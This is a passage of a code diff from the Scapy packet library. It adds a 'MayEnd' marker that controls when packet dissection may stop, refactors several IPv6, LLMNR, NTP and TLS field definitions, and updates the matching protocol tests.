ByteField("len", None), StrFixedLenField("country_string", b"\0\0\0", length=3), - PacketListField( + MayEnd(PacketListField( "descriptors", [], Dot11EltCountryConstraintTriplet, length_from=lambda pkt: ( pkt.len - 3 - (pkt.len % 3) ) - ), + )), + # When this extension is last, padding appears to be omitted ConditionalField( ByteField("pad", 0), lambda pkt: (len(pkt.descriptors) + 1) % 2 diff --git a/scapy/layers/inet6.py b/scapy/layers/inet6.py index 125e57ec272..b54cca234c4 100644 --- a/scapy/layers/inet6.py +++ b/scapy/layers/inet6.py @@ -34,11 +34,32 @@ MTU, ) from scapy.error import log_runtime, warning -from scapy.fields import BitEnumField, BitField, ByteEnumField, ByteField, \ - DestIP6Field, FieldLenField, FlagsField, IntField, IP6Field, \ - LongField, MACField, PacketLenField, PacketListField, ShortEnumField, \ - ShortField, SourceIP6Field, StrField, StrFixedLenField, StrLenField, \ - X3BytesField, XBitField, XIntField, XShortField +from scapy.fields import ( + BitEnumField, + BitField, + ByteEnumField, + ByteField, + DestIP6Field, + FieldLenField, + FlagsField, + IntField, + IP6Field, + LongField, + MACField, + MayEnd, + PacketLenField, + PacketListField, + ShortEnumField, + ShortField, + SourceIP6Field, + StrField, + StrFixedLenField, + StrLenField, + X3BytesField, + XBitField, + XIntField, + XShortField, +) from scapy.layers.inet import IP, IPTools, TCP, TCPerror, TracerouteResult, \ UDP, UDPerror from scapy.layers.l2 import CookedLinux, Ether, GRE, Loopback, SNAP @@ -1767,44 +1788,22 @@ def mysummary(self): class TruncPktLenField(PacketLenField): - __slots__ = ["cur_shift"] - - def __init__(self, name, default, cls, cur_shift, length_from=None, shift=0): # noqa: E501 - PacketLenField.__init__(self, name, default, cls, length_from=length_from) # noqa: E501 - self.cur_shift = cur_shift - - def getfield(self, pkt, s): - tmp_len = self.length_from(pkt) - i = self.m2i(pkt, s[:tmp_len]) - return s[tmp_len:], i - - def m2i(self, pkt, m): - s = None - try: # It can happen we have sth shorter than 40 bytes - s = self.cls(m) - except Exception: - return conf.raw_layer(m) - return s - def i2m(self, pkt, x): - s = raw(x) + s = bytes(x) tmp_len = len(s) - r = (tmp_len + self.cur_shift) % 8 - tmp_len = tmp_len - r - return s[:tmp_len] + return s[:tmp_len - (tmp_len % 8)] def i2len(self, pkt, i): return len(self.i2m(pkt, i)) -# Faire un post_build pour le recalcul de la taille (en multiple de 8 octets) class ICMPv6NDOptRedirectedHdr(_ICMPv6NDGuessPayload, Packet): name = "ICMPv6 Neighbor Discovery Option - Redirected Header" fields_desc = [ByteField("type", 4), FieldLenField("len", None, length_of="pkt", fmt="B", - adjust=lambda pkt, x:(x + 8) // 8), - StrFixedLenField("res", b"\x00" * 6, 6), - TruncPktLenField("pkt", b"", IPv6, 8, + adjust=lambda pkt, x: (x + 8) // 8), + MayEnd(StrFixedLenField("res", b"\x00" * 6, 6)), + TruncPktLenField("pkt", b"", IPv6, length_from=lambda pkt: 8 * pkt.len - 8)] # See which value should be used for default MTU instead of 1280 diff --git a/scapy/layers/llmnr.py b/scapy/layers/llmnr.py index 9cce97cd8c0..c393d1f3109 100644 --- a/scapy/layers/llmnr.py +++ b/scapy/layers/llmnr.py @@ -19,10 +19,9 @@ from scapy.compat import orb from scapy.layers.inet import UDP from scapy.layers.dns import ( - DNSQRField, - DNSRRField, - DNSRRCountField, + DNSCompressedPacket, DNS_am, + DNS, ) @@ -30,37 +29,35 @@ _LLMNR_IPv4_mcast_addr = "224.0.0.252" -class LLMNRQuery(Packet): +class LLMNRQuery(DNSCompressedPacket): name = "Link Local Multicast Node Resolution - Query" - fields_desc = [ShortField("id", 0), - BitField("qr", 0, 1), - BitEnumField("opcode", 0, 4, {0: "QUERY"}), - BitField("c", 0, 1), - BitField("tc", 0, 2), - BitField("z", 0, 4), - BitEnumField("rcode", 0, 4, {0: "ok"}), - DNSRRCountField("qdcount", None, "qd"), - DNSRRCountField("ancount", None, "an"), - DNSRRCountField("nscount", None, "ns"), - DNSRRCountField("arcount", None, "ar"), - DNSQRField("qd", "qdcount", None), - DNSRRField("an", "ancount", None), - DNSRRField("ns", "nscount", None), - DNSRRField("ar", "arcount", None, 0)] + qd = [] + fields_desc = [ + ShortField("id", 0), + BitField("qr", 0, 1), + BitEnumField("opcode", 0, 4, {0: "QUERY"}), + BitField("c", 0, 1), + BitField("tc", 0, 2), + BitField("z", 0, 4) + ] + DNS.fields_desc[-9:] overload_fields = {UDP: {"sport": 5355, "dport": 5355}} + def get_full(self): + # Required for DNSCompressedPacket + return self.original + def hashret(self): return struct.pack("!H", self.id) def mysummary(self): if self.an: return "LLMNRResponse '%s' is at '%s'" % ( - self.an.rrname.decode(errors="backslashreplace"), - self.an.rdata, + self.an[0].rrname.decode(errors="backslashreplace"), + self.an[0].rdata, ), [UDP] if self.qd: return "LLMNRQuery who has '%s'" % ( - self.qd.qname.decode(errors="backslashreplace"), + self.qd[0].qname.decode(errors="backslashreplace"), ), [UDP] diff --git a/scapy/layers/ntp.py b/scapy/layers/ntp.py index e7585743294..9b0d4e4ae6b 100644 --- a/scapy/layers/ntp.py +++ b/scapy/layers/ntp.py @@ -13,12 +13,32 @@ import datetime from scapy.packet import Packet, bind_layers -from scapy.fields import BitField, BitEnumField, ByteField, ByteEnumField, \ - XByteField, SignedByteField, FlagsField, ShortField, LEShortField, \ - IntField, LEIntField, FixedPointField, IPField, StrField, \ - StrFixedLenField, StrFixedLenEnumField, XStrFixedLenField, PacketField, \ - PacketLenField, PacketListField, FieldListField, ConditionalField, \ - PadField +from scapy.fields import ( + BitEnumField, + BitField, + ByteEnumField, + ByteField, + ConditionalField, + FieldListField, + FixedPointField, + FlagsField, + IPField, + IntField, + LEIntField, + LEShortField, + MayEnd, + PacketField, + PacketLenField, + PacketListField, + PadField, + ShortField, + SignedByteField, + StrField, + StrFixedLenEnumField, + StrFixedLenField, + XByteField, + XStrFixedLenField, +) from scapy.layers.inet6 import IP6Field from scapy.layers.inet import UDP from scapy.utils import lhex @@ -741,6 +761,8 @@ class NTPControlDataPacketLenField(PacketLenField): def m2i(self, pkt, m): ret = None + if not m: + return ret # op_code == CTL_OP_READSTAT if pkt.op_code == 1: @@ -808,8 +830,8 @@ class NTPControl(NTP): ShortField("association_id", 0), ShortField("offset", 0), ShortField("count", None), - NTPControlDataPacketLenField( - "data", "", Packet, length_from=lambda p: p.count), + MayEnd(NTPControlDataPacketLenField( + "data", "", Packet, length_from=lambda p: p.count)), PacketField("authenticator", "", NTPAuthenticator), ] @@ -1156,7 +1178,8 @@ class NTPInfoMemStats(Packet): "hashcount", [0.0 for i in range(0, _NTP_HASH_SIZE)], ByteField("", 0), - count_from=lambda p: _NTP_HASH_SIZE + count_from=lambda p: _NTP_HASH_SIZE, + max_count=_NTP_HASH_SIZE ) ] diff --git a/scapy/layers/tls/extensions.py b/scapy/layers/tls/extensions.py index c5d80d329c5..87ffe67219c 100644 --- a/scapy/layers/tls/extensions.py +++ b/scapy/layers/tls/extensions.py @@ -11,9 +11,22 @@ import os import struct -from scapy.fields import ByteEnumField, ByteField, EnumField, FieldLenField, \ - FieldListField, IntField, PacketField, PacketListField, ShortEnumField, \ - ShortField, StrFixedLenField, StrLenField, XStrLenField +from scapy.fields import ( + ByteEnumField, + ByteField, + EnumField, + FieldLenField, + FieldListField, + IntField, + MayEnd, + PacketField, + PacketListField, + ShortEnumField, + ShortField, + StrFixedLenField, + StrLenField, + XStrLenField, +) from scapy.packet import Packet, Raw, Padding from scapy.layers.x509 import X509_Extensions from scapy.layers.tls.basefields import _tls_version @@ -196,8 +209,8 @@ def addfield(self, pkt, s, val): class TLS_Ext_ServerName(TLS_Ext_PrettyPacketList): # RFC 4366 name = "TLS Extension - Server Name" fields_desc = [ShortEnumField("type", 0, _tls_ext), - FieldLenField("len", None, length_of="servernames", - adjust=lambda pkt, x: x + 2), + MayEnd(FieldLenField("len", None, length_of="servernames", + adjust=lambda pkt, x: x + 2)), ServerLenField("servernameslen", None, length_of="servernames"), ServerListField("servernames", [], ServerName, @@ -207,7 +220,7 @@ class TLS_Ext_ServerName(TLS_Ext_PrettyPacketList): # RFC 4366 class TLS_Ext_EncryptedServerName(TLS_Ext_PrettyPacketList): name = "TLS Extension - Encrypted Server Name" fields_desc = [ShortEnumField("type", 0xffce, _tls_ext), - ShortField("len", None), + MayEnd(ShortField("len", None)), EnumField("cipher", None, _tls_cipher_suites), ShortEnumField("key_exchange_group", None, _tls_named_groups), @@ -228,7 +241,7 @@ class TLS_Ext_EncryptedServerName(TLS_Ext_PrettyPacketList): class TLS_Ext_MaxFragLen(TLS_Ext_Unknown): # RFC 4366 name = "TLS Extension - Max Fragment Length" fields_desc = [ShortEnumField("type", 1, _tls_ext), - ShortField("len", None), + MayEnd(ShortField("len", None)), ByteEnumField("maxfraglen", 4, {1: "2^9", 2: "2^10", 3: "2^11", @@ -238,7 +251,7 @@ class TLS_Ext_MaxFragLen(TLS_Ext_Unknown): # RFC 4366 class TLS_Ext_ClientCertURL(TLS_Ext_Unknown): # RFC 4366 name = "TLS Extension - Client Certificate URL" fields_desc = [ShortEnumField("type", 2, _tls_ext), - ShortField("len", None)] + MayEnd(ShortField("len", None))] _tls_trusted_authority_types = {0: "pre_agreed", @@ -310,7 +323,7 @@ def m2i(self, pkt, m): class TLS_Ext_TrustedCAInd(TLS_Ext_Unknown): # RFC 4366 name = "TLS Extension - Trusted CA Indication" fields_desc = [ShortEnumField("type", 3, _tls_ext), - ShortField("len", None), + MayEnd(ShortField("len", None)), FieldLenField("talen", None, length_of="ta"), _TAListField("ta", [], Raw, length_from=lambda pkt: pkt.talen)] @@ -319,7 +332,7 @@ class TLS_Ext_TrustedCAInd(TLS_Ext_Unknown): # RFC 4366 class TLS_Ext_TruncatedHMAC(TLS_Ext_Unknown): # RFC 4366 name = "TLS Extension - Truncated HMAC" fields_desc = [ShortEnumField("type", 4, _tls_ext), - ShortField("len", None)] + MayEnd(ShortField("len", None))] class ResponderID(Packet): @@ -363,7 +376,7 @@ def m2i(self, pkt, m): class TLS_Ext_CSR(TLS_Ext_Unknown): # RFC 4366 name = "TLS Extension - Certificate Status Request" fields_desc = [ShortEnumField("type", 5, _tls_ext), - ShortField("len", None), + MayEnd(ShortField("len", None)), ByteEnumField("stype", None, _cert_status_type), _StatusReqField("req", [], Raw, length_from=lambda pkt: pkt.len - 1)] @@ -372,7 +385,7 @@ class TLS_Ext_CSR(TLS_Ext_Unknown): # RFC 4366 class TLS_Ext_UserMapping(TLS_Ext_Unknown): # RFC 4681 name = "TLS Extension - User Mapping" fields_desc = [ShortEnumField("type", 6, _tls_ext), - ShortField("len", None), + MayEnd(ShortField("len", None)), FieldLenField("umlen", None, fmt="B", length_of="um"), FieldListField("um", [], ByteField("umtype", 0), @@ -383,7 +396,7 @@ class TLS_Ext_ClientAuthz(TLS_Ext_Unknown): # RFC 5878 """ XXX Unsupported """ name = "TLS Extension - Client Authz" fields_desc = [ShortEnumField("type", 7, _tls_ext), - ShortField("len", None), + MayEnd(ShortField("len", None)), ] @@ -391,7 +404,7 @@ class TLS_Ext_ServerAuthz(TLS_Ext_Unknown): # RFC 5878 """ XXX Unsupported """ name = "TLS Extension - Server Authz" fields_desc = [ShortEnumField("type", 8, _tls_ext), - ShortField("len", None), + MayEnd(ShortField("len", None)), ] @@ -401,7 +414,7 @@ class TLS_Ext_ServerAuthz(TLS_Ext_Unknown): # RFC 5878 class TLS_Ext_ClientCertType(TLS_Ext_Unknown): # RFC 5081 name = "TLS Extension - Certificate Type (client version)" fields_desc = [ShortEnumField("type", 9, _tls_ext), - ShortField("len", None), + MayEnd(ShortField("len", None)), FieldLenField("ctypeslen", None, length_of="ctypes"), FieldListField("ctypes", [0, 1], ByteEnumField("certtypes", None, @@ -412,7 +425,7 @@ class TLS_Ext_ClientCertType(TLS_Ext_Unknown): # RFC 5081 class TLS_Ext_ServerCertType(TLS_Ext_Unknown): # RFC 5081 name = "TLS Extension - Certificate Type (server version)" fields_desc = [ShortEnumField("type", 9, _tls_ext), - ShortField("len", None), + MayEnd(ShortField("len", None)), ByteEnumField("ctype", None, _tls_cert_types)] @@ -436,7 +449,7 @@ class TLS_Ext_SupportedGroups(TLS_Ext_Unknown): """ name = "TLS Extension - Supported Groups" fields_desc = [ShortEnumField("type", 10, _tls_ext), - ShortField("len", None), + MayEnd(ShortField("len", None)), FieldLenField("groupslen", None, length_of="groups"), FieldListField("groups", [], ShortEnumField("ng", None, @@ -456,7 +469,7 @@ class TLS_Ext_SupportedEllipticCurves(TLS_Ext_SupportedGroups): # RFC 4492 class TLS_Ext_SupportedPointFormat(TLS_Ext_Unknown): # RFC 4492 name = "TLS Extension - Supported Point Format" fields_desc = [ShortEnumField("type", 11, _tls_ext), - ShortField("len", None), + MayEnd(ShortField("len", None)), FieldLenField("ecpllen", None, fmt="B", length_of="ecpl"), FieldListField("ecpl", [0], ByteEnumField("nc", None, @@ -467,7 +480,7 @@ class TLS_Ext_SupportedPointFormat(TLS_Ext_Unknown): # RFC 4492 class TLS_Ext_SignatureAlgorithms(TLS_Ext_Unknown): # RFC 5246 name = "TLS Extension - Signature Algorithms" fields_desc = [ShortEnumField("type", 13, _tls_ext), - ShortField("len", None), + MayEnd(ShortField("len", None)), SigAndHashAlgsLenField("sig_algs_len", None, length_of="sig_algs"), SigAndHashAlgsField("sig_algs", [], @@ -479,7 +492,7 @@ class TLS_Ext_SignatureAlgorithms(TLS_Ext_Unknown): # RFC 5246 class TLS_Ext_Heartbeat(TLS_Ext_Unknown): # RFC 6520 name = "TLS Extension - Heartbeat" fields_desc = [ShortEnumField("type", 0x0f, _tls_ext), - ShortField("len", None), + MayEnd(ShortField("len", None)), ByteEnumField("heartbeat_mode", 2, {1: "peer_allowed_to_send", 2: "peer_not_allowed_to_send"})] @@ -504,7 +517,7 @@ def i2repr(self, pkt, x): class TLS_Ext_ALPN(TLS_Ext_PrettyPacketList): # RFC 7301 name = "TLS Extension - Application Layer Protocol Negotiation" fields_desc = [ShortEnumField("type", 0x10, _tls_ext), - ShortField("len", None), + MayEnd(ShortField("len", None)), FieldLenField("protocolslen", None, length_of="protocols"), ProtocolListField("protocols", [], ProtocolName, length_from=lambda pkt:pkt.protocolslen)] @@ -521,13 +534,13 @@ class TLS_Ext_Padding(TLS_Ext_Unknown): # RFC 7685 class TLS_Ext_EncryptThenMAC(TLS_Ext_Unknown): # RFC 7366 name = "TLS Extension - Encrypt-then-MAC" fields_desc = [ShortEnumField("type", 0x16, _tls_ext), - ShortField("len", None)] + MayEnd(ShortField("len", None))] class TLS_Ext_ExtendedMasterSecret(TLS_Ext_Unknown): # RFC 7627 name = "TLS Extension - Extended Master Secret" fields_desc = [ShortEnumField("type", 0x17, _tls_ext), - ShortField("len", None)] + MayEnd(ShortField("len", None))] class TLS_Ext_SessionTicket(TLS_Ext_Unknown): # RFC 5077 @@ -545,25 +558,25 @@ class TLS_Ext_SessionTicket(TLS_Ext_Unknown): # RFC 5077 class TLS_Ext_KeyShare(TLS_Ext_Unknown): name = "TLS Extension - Key Share (dummy class)" fields_desc = [ShortEnumField("type", 0x33, _tls_ext), - ShortField("len", None)] + MayEnd(ShortField("len", None))] class TLS_Ext_PreSharedKey(TLS_Ext_Unknown): name = "TLS Extension - Pre Shared Key (dummy class)" fields_desc = [ShortEnumField("type", 0x29, _tls_ext), - ShortField("len", None)] + MayEnd(ShortField("len", None))] class TLS_Ext_EarlyDataIndication(TLS_Ext_Unknown): name = "TLS Extension - Early Data" fields_desc = [ShortEnumField("type", 0x2a, _tls_ext), - ShortField("len", None)] + MayEnd(ShortField("len", None))] class TLS_Ext_EarlyDataIndicationTicket(TLS_Ext_Unknown): name = "TLS Extension - Ticket Early Data Info" fields_desc = [ShortEnumField("type", 0x2a, _tls_ext), - ShortField("len", None), + MayEnd(ShortField("len", None)), IntField("max_early_data_size", 0)] @@ -575,13 +588,13 @@ class TLS_Ext_EarlyDataIndicationTicket(TLS_Ext_Unknown): class TLS_Ext_SupportedVersions(TLS_Ext_Unknown): name = "TLS Extension - Supported Versions (dummy class)" fields_desc = [ShortEnumField("type", 0x2b, _tls_ext), - ShortField("len", None)] + MayEnd(ShortField("len", None))] class TLS_Ext_SupportedVersion_CH(TLS_Ext_Unknown): name = "TLS Extension - Supported Versions (for ClientHello)" fields_desc = [ShortEnumField("type", 0x2b, _tls_ext), - ShortField("len", None), + MayEnd(ShortField("len", None)), FieldLenField("versionslen", None, fmt='B', length_of="versions"), FieldListField("versions", [], @@ -593,7 +606,7 @@ class TLS_Ext_SupportedVersion_CH(TLS_Ext_Unknown): class TLS_Ext_SupportedVersion_SH(TLS_Ext_Unknown): name = "TLS Extension - Supported Versions (for ServerHello)" fields_desc = [ShortEnumField("type", 0x2b, _tls_ext), - ShortField("len", None), + MayEnd(ShortField("len", None)), ShortEnumField("version", None, _tls_version)] @@ -604,7 +617,7 @@ class TLS_Ext_SupportedVersion_SH(TLS_Ext_Unknown): class TLS_Ext_Cookie(TLS_Ext_Unknown): name = "TLS Extension - Cookie" fields_desc = [ShortEnumField("type", 0x2c, _tls_ext), - ShortField("len", None), + MayEnd(ShortField("len", None)), FieldLenField("cookielen", None, length_of="cookie"), XStrLenField("cookie", "", length_from=lambda pkt: pkt.cookielen)] @@ -622,7 +635,7 @@ def build(self): class TLS_Ext_PSKKeyExchangeModes(TLS_Ext_Unknown): name = "TLS Extension - PSK Key Exchange Modes" fields_desc = [ShortEnumField("type", 0x2d, _tls_ext), - ShortField("len", None), + MayEnd(ShortField("len", None)), FieldLenField("kxmodeslen", None, fmt='B', length_of="kxmodes"), FieldListField("kxmodes", [], @@ -634,7 +647,7 @@ class TLS_Ext_PSKKeyExchangeModes(TLS_Ext_Unknown): class TLS_Ext_TicketEarlyDataInfo(TLS_Ext_Unknown): name = "TLS Extension - Ticket Early Data Info" fields_desc = [ShortEnumField("type", 0x2e, _tls_ext), - ShortField("len", None), + MayEnd(ShortField("len", None)), IntField("max_early_data_size", 0)] @@ -652,13 +665,13 @@ class TLS_Ext_NPN(TLS_Ext_PrettyPacketList): class TLS_Ext_PostHandshakeAuth(TLS_Ext_Unknown): # RFC 8446 name = "TLS Extension - Post Handshake Auth" fields_desc = [ShortEnumField("type", 0x31, _tls_ext), - ShortField("len", None)] + MayEnd(ShortField("len", None))] class TLS_Ext_SignatureAlgorithmsCert(TLS_Ext_Unknown): # RFC 8446 name = "TLS Extension - Signature Algorithms Cert" fields_desc = [ShortEnumField("type", 0x32, _tls_ext), - ShortField("len", None), + MayEnd(ShortField("len", None)), SigAndHashAlgsLenField("sig_algs_len", None, length_of="sig_algs"), SigAndHashAlgsField("sig_algs", [], @@ -670,7 +683,7 @@ class TLS_Ext_SignatureAlgorithmsCert(TLS_Ext_Unknown): # RFC 8446 class TLS_Ext_RenegotiationInfo(TLS_Ext_Unknown): # RFC 5746 name = "TLS Extension - Renegotiation Indication" fields_desc = [ShortEnumField("type", 0xff01, _tls_ext), - ShortField("len", None), + MayEnd(ShortField("len", None)), FieldLenField("reneg_conn_len", None, fmt='B', length_of="renegotiated_connection"), StrLenField("renegotiated_connection", "", @@ -680,7 +693,7 @@ class TLS_Ext_RenegotiationInfo(TLS_Ext_Unknown): # RFC 5746 class TLS_Ext_RecordSizeLimit(TLS_Ext_Unknown): # RFC 8449 name = "TLS Extension - Record Size Limit" fields_desc = [ShortEnumField("type", 0x1c, _tls_ext), - ShortField("len", None), + MayEnd(ShortField("len", None)), ShortField("record_size_limit", None)] diff --git a/scapy/layers/tls/keyexchange_tls13.py b/scapy/layers/tls/keyexchange_tls13.py index 1df598de82f..878e88b3fc6 100644 --- a/scapy/layers/tls/keyexchange_tls13.py +++ b/scapy/layers/tls/keyexchange_tls13.py @@ -16,6 +16,7 @@ FieldLenField, IntField, PacketField, + PacketLenField, PacketListField, ShortEnumField, ShortField, @@ -23,7 +24,7 @@ StrLenField, XStrLenField, ) -from scapy.packet import Packet, Padding +from scapy.packet import Packet from scapy.layers.tls.extensions import TLS_Ext_Unknown, _tls_ext from scapy.layers.tls.crypto.groups import ( _tls_named_curves, @@ -228,27 +229,25 @@ class Ticket(Packet): StrFixedLenField("mac", None, 32)] -class TicketField(PacketField): - __slots__ = ["length_from"] - - def __init__(self, name, default, length_from=None, **kargs): - self.length_from = length_from - PacketField.__init__(self, name, default, Ticket, **kargs) - +class TicketField(PacketLenField): def m2i(self, pkt, m): - tmp_len = self.length_from(pkt) - tbd, rem = m[:tmp_len], m[tmp_len:] - return self.cls(tbd) / Padding(rem) + if len(m) < 64: + # Minimum ticket size is 64 bytes + return conf.raw_layer(m) + return self.cls(m) class PSKIdentity(Packet): name = "PSK Identity" fields_desc = [FieldLenField("identity_len", None, length_of="identity"), - TicketField("identity", "", + TicketField("identity", "", Ticket, length_from=lambda pkt: pkt.identity_len), IntField("obfuscated_ticket_age", 0)] + def default_payload_class(self, payload): + return conf.padding_layer + class PSKBinderEntry(Packet): name = "PSK Binder Entry" @@ -257,6 +256,9 @@ class PSKBinderEntry(Packet): StrLenField("binder", "", length_from=lambda pkt: pkt.binder_len)] + def default_payload_class(self, payload): + return conf.padding_layer + class TLS_Ext_PreSharedKey_CH(TLS_Ext_Unknown): # XXX define post_build and post_dissection methods diff --git a/scapy/packet.py b/scapy/packet.py index 4c35c517d28..e35b1bfc45a 100644 --- a/scapy/packet.py +++ b/scapy/packet.py @@ -30,6 +30,7 @@ Field, FlagsField, FlagValue, + MayEnd, MultiEnumField, MultipleTypeField, PacketListField, @@ -1005,8 +1006,6 @@ def do_dissect(self, s): _raw = s self.raw_packet_cache_fields = {} for f in self.fields_desc: - if not s: - break s, fval = f.getfield(self, s) # Skip unused ConditionalField if isinstance(f, ConditionalField) and fval is None: @@ -1017,6 +1016,11 @@ def do_dissect(self, s): self.raw_packet_cache_fields[f.name] = \ self._raw_packet_cache_field_value(f, fval, copy=True) self.fields[f.name] = fval + # Nothing left to dissect + if not s and (isinstance(f, MayEnd) or + (fval is not None and isinstance(f, ConditionalField) and + isinstance(f.fld, MayEnd))): + break self.raw_packet_cache = _raw[:-len(s)] if s else _raw self.explicit = 1 return s diff --git a/test/answering_machines.uts b/test/answering_machines.uts index 54eee4a705c..bb80f66c391 100644 --- a/test/answering_machines.uts +++ b/test/answering_machines.uts @@ -11,11 +11,12 @@ import mock @mock.patch("scapy.ansmachine.sniff") def test_am(cls_name, packet_query, check_reply, mock_sniff, **kargs): + packet_query = packet_query.__class__(bytes(packet_query)) def sniff(*args,**kargs): kargs["prn"](packet_query) mock_sniff.side_effect = sniff am = cls_name(**kargs) - am.send_reply = check_reply + am.send_reply = lambda x: check_reply(x.__class__(bytes(x))) am() @@ -32,10 +33,10 @@ test_am(BOOTP_am, = DHCP_am def check_DHCP_am_reply(packet): assert DHCP in packet and len(packet[DHCP].options) - assert ("domain", "localnet") in packet[DHCP].options + assert ("domain", b"localnet") in packet[DHCP].options test_am(DHCP_am, - Ether()/IP()/UDP()/BOOTP(op=1)/DHCP(), + Ether()/IP()/UDP()/BOOTP(op=1)/DHCP(options=[('message-type', 'request')]), check_DHCP_am_reply) @@ -64,7 +65,8 @@ test_am(ICMPEcho_am, = DNS_am def check_DNS_am_reply(packet): assert DNS in packet and packet[DNS].ancount == 1 - assert packet[DNS].an.rdata == "192.168.1.1" + assert packet[DNS].an[0].rdata == "192.168.1.1" + assert packet[DNS].qd[0].qname == b"www.secdev.org." test_am(DNS_am, IP()/UDP()/DNS(qd=DNSQR(qname="www.secdev.org")), @@ -138,7 +140,7 @@ test_WiFi_am(Dot11(FCfield="to-DS")/IP()/TCP()/"Scapy", = NBNS_am def check_NBNS_am_reply(name): def check(packet): - assert NBNSQueryResponse in packet and packet[NBNSQueryResponse].RR_NAME == bytes_encode(name) + assert NBNSQueryResponse in packet and packet[NBNSQueryResponse].RR_NAME.strip() == bytes_encode(name) return check for server_name in (None, "", b"test", "test"): diff --git a/test/contrib/automotive/doip.uts b/test/contrib/automotive/doip.uts index 33dc9793f6d..99ebef167d1 100644 --- a/test/contrib/automotive/doip.uts +++ b/test/contrib/automotive/doip.uts @@ -297,7 +297,7 @@ assert p.previous_msg == b'\x10\x03' + pcap based tests = read diag_ack pcap file -pkt = rdpcap("test/pcaps/doip_ack.pcap").res[0] +pkt = rdpcap(scapy_path("test/pcaps/doip_ack.pcap")).res[0] assert len(pkt) == 70 @@ -313,7 +313,7 @@ assert pkt.previous_msg == b'\x22\xFD\x31' = read main pcap file -pkts = rdpcap("test/pcaps/doip.pcap.gz") +pkts = rdpcap(scapy_path("test/pcaps/doip.pcap.gz")) ips = [p for p in pkts if p.proto == 6] assert len(ips) > 1 diff --git a/test/contrib/automotive/ecu.uts b/test/contrib/automotive/ecu.uts index af1d70e67db..ede976bc0f5 100644 --- a/test/contrib/automotive/ecu.uts +++ b/test/contrib/automotive/ecu.uts @@ -606,8 +606,9 @@ assert unanswered_packets[0].diagnosticSessionType == 4 = Analyze multiple UDS messages -with PcapReader(scapy_path("test/pcaps/ecu_trace.pcap.gz")) as sock: - udsmsgs = sniff(session=ISOTPSession, session_kwargs={"use_ext_address":False, "basecls":UDS}, count=50, opened_socket=sock, timeout=3) +udsmsgs = sniff(offline=scapy_path("test/pcaps/ecu_trace.pcap.gz"), + session=ISOTPSession, session_kwargs={"use_ext_address":False, "basecls":UDS}, + count=50, timeout=3) assert len(udsmsgs) == 50 @@ -701,8 +702,10 @@ session = EcuSession(verbose=False, store_supported_responses=False) conf.contribs['GMLAN']['GMLAN_ECU_AddressingScheme'] = 4 conf.contribs['CAN']['swap-bytes'] = True -with PcapReader(scapy_path("test/pcaps/gmlan_trace.pcap.gz")) as sock: - gmlanmsgs = sniff(session=ISOTPSession, session_kwargs={"supersession": session, "rx_id":[0x241, 0x641, 0x101], "basecls":GMLAN}, count=200, opened_socket=sock, timeout=6) +conf.debug_dissector = True +gmlanmsgs = sniff(offline=scapy_path("test/pcaps/gmlan_trace.pcap.gz"), session=ISOTPSession, + session_kwargs={"supersession": session, "rx_id":[0x241, 0x641, 0x101], "basecls":GMLAN}, + count=200, timeout=6) ecu = session.ecu assert len(ecu.supported_responses) == 0 diff --git a/test/contrib/automotive/obd/obd.uts b/test/contrib/automotive/obd/obd.uts index 17f3df69a82..fa65e95e447 100644 --- a/test/contrib/automotive/obd/obd.uts +++ b/test/contrib/automotive/obd/obd.uts @@ -445,7 +445,7 @@ assert p.data_records[0].turbocharger_a_turbine_inlet_temperature == \ round((0x2233 * 0.1) - 40, 3) assert p.data_records[0].turbocharger_a_turbine_outlet_temperature == \ round((0x4455 * 0.1) - 40, 3) -r = OBD(b'\x02\x75') +r = OBD(b'\x02\x75\x00') assert p.answers(r) @@ -465,7 +465,7 @@ assert p.data_records[0].sensor2 == 1707.7 assert p.data_records[0].sensor3 == 1759.1 assert p.data_records[0].sensor4 == 1810.5 -r = OBD(b'\x02\x78') +r = OBD(b'\x02\x78\x00') assert p.answers(r) = Check dissecting a response for Service 02 PID 7F @@ -485,7 +485,7 @@ assert p.data_records[0].total == 0xFFFFFFFFFFFFFFFF assert p.data_records[0].total_idle == 0x0102030405060708 assert p.data_records[0].total_with_pto_active == 0x0011223344556677 -r = OBD(b'\x02\x7F') +r = OBD(b'\x02\x7F\x00') assert p.answers(r) @@ -497,7 +497,7 @@ assert p.data_records[0].pid == 0x89 assert p.data_records[0].frame_no == 0x01 assert p.data_records[0].data == b'ABCDEFGHIKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOP' -r = OBD(b'\x02\x89') +r = OBD(b'\x02\x89\x00') assert p.answers(r) = Check dissecting a response for Service 02 PID 0C, 05, 04 diff --git a/test/contrib/automotive/uds.uts b/test/contrib/automotive/uds.uts index 221554dd9a7..ead0097accb 100644 --- a/test/contrib/automotive/uds.uts +++ b/test/contrib/automotive/uds.uts @@ -26,7 +26,7 @@ dsc.hashret() == dscpr.hashret() = Check if negative response answers dsc = UDS(b'\x10') -neg = UDS(b'\x7f\x10') +neg = UDS(b'\x7f\x10\x00') assert neg.answers(dsc) = CHECK hashret NEG @@ -35,7 +35,7 @@ dsc.hashret() == neg.hashret() = Check if negative response answers not dsc = UDS(b'\x10') -neg = UDS(b'\x7f\x11') +neg = UDS(b'\x7f\x11\x00') assert not neg.answers(dsc) = Check if positive response answers not diff --git a/test/contrib/bgp.uts b/test/contrib/bgp.uts index d9e0c5992a9..6b1edfea1f9 100644 --- a/test/contrib/bgp.uts +++ b/test/contrib/bgp.uts @@ -315,7 +315,7 @@ raw(BGPAuthenticationInformation()) == b'\x00' = BGPAuthenticationInformation - Basic dissection c = BGPAuthenticationInformation(b'\x00') -c.authentication_code == 0 and c.authentication_data == None +c.authentication_code == 0 and not c.authentication_data ################################# BGPOptParam ################################# diff --git a/test/contrib/eigrp.uts b/test/contrib/eigrp.uts index cee8a23003a..cb29649e953 100644 --- a/test/contrib/eigrp.uts +++ b/test/contrib/eigrp.uts @@ -85,37 +85,37 @@ assert inet_pton(socket.AF_INET6, f.randval()) = EIGRPGuessPayloadClass function: Return Parameters TLV from scapy.contrib.eigrp import _EIGRPGuessPayloadClass -isinstance(_EIGRPGuessPayloadClass(b"\x00\x01"), EIGRPParam) +isinstance(_EIGRPGuessPayloadClass(b"\x00\x01" + b"\x00" * 50), EIGRPParam) = EIGRPGuessPayloadClass function: Return Authentication Data TLV -isinstance(_EIGRPGuessPayloadClass(b"\x00\x02"), EIGRPAuthData) +isinstance(_EIGRPGuessPayloadClass(b"\x00\x02" + b"\x00" * 50), EIGRPAuthData) = EIGRPGuessPayloadClass function: Return Sequence TLV -isinstance(_EIGRPGuessPayloadClass(b"\x00\x03"), EIGRPSeq) +isinstance(_EIGRPGuessPayloadClass(b"\x00\x03" + b"\x00" * 50), 